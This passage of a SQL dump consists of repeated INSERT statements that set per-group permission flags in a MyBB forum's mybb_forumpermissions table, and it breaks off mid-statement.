`canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('650', '19', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('651', '28', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('652', '29', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('653', '39', '20', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('850', '30', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('655', '31', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('656', '44', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('657', '45', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('694', '48', '20', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('993', '50', '20', '0', '1', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('660', '54', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('661', '60', '20', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('662', '61', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('663', '62', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('823', '64', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('665', '66', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('666', '78', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('667', '79', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('668', '80', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('764', '5', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('765', '2', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('766', '19', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('767', '28', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('768', '29', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('769', '39', '21', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('851', '30', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('771', '31', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('772', '44', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('773', '45', '21', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('774', '48', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('994', '50', '21', '0', '1', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('776', '54', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('777', '60', '21', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('778', '61', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('779', '62', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('780', '66', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('781', '78', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('782', '79', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('783', '80', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('784', '81', '21', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('788', '82', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('789', '82', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('793', '82', '9', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('790', '82', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('791', '82', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('792', '82', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('794', '82', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('795', '82', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('796', '82', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('797', '82', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('798', '82', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('799', '82', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('809', '10', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('810', '83', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('812', '34', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('813', '51', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('814', '75', '10', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('831', '84', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('832', '84', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('833', '84', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('834', '84', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('835', '84', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('836', '84', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('837', '84', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('838', '84', '15', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('839', '84', '17', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('840', '84', '20', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', 